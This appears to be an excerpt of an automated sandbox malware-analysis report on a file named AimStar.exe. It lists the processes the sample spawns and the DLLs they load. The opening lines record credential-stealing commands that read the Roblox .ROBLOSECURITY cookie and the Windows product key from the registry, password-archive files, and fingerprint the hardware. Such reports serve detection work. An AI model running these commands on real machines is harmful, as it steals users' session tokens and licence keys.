              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe C:\Users\user\AppData\Local\Temp\_MEI72842\rar.exe a -r -hp"sere" "C:\Users\user\AppData\Local\Temp\1KgHr.zip" *
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic os get Caption
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic computersystem get totalphysicalmemory
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic csproduct get uuid
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic path win32_VideoController get name
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: vcruntime140.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: python3.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: libffi-8.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: sqlite3.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: libcrypto-3.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: libssl-3.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: dciman32.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: winmmbase.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: mmdevapi.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: devobj.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: ksuser.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: avrt.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: audioses.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: msacm32.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: midimap.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\AimStar.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: msxml6.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: urlmon.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: iertutil.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vcruntime140_1.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: vbscript.dll
              Source: C:\Windows\System32\wbem\WMIC.exeSection loaded: sxs.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dll
              Source: C:\Windows\System32\tree.comSection loaded: ulib.dll
              Source: C:\Windows\System32\tree.comSection loaded: fsutilext.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dll
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dll
